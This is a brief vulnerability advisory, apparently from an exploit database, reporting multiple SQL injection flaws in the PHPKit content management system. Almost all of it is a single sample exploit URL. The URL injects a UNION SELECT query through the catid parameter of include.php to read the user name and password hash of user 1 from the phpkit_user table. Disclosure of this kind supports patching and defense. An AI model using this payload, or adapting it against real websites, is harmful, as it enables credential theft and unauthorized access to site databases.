PHPKit Multiple SQL Injection Vulnerabilities

PHPKit Multiple SQL Injection Vulnerabilities

Attackers can exploit these issues via a web client.

The following sample exploit is available:

http://www.example.com/include.php?path=faq/faq.php&catid=-1\'%20UNION%20SELECT%201,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20FROM%20phpkit_user%20where%20%20user_id=1%20and%20\'1\'=\'1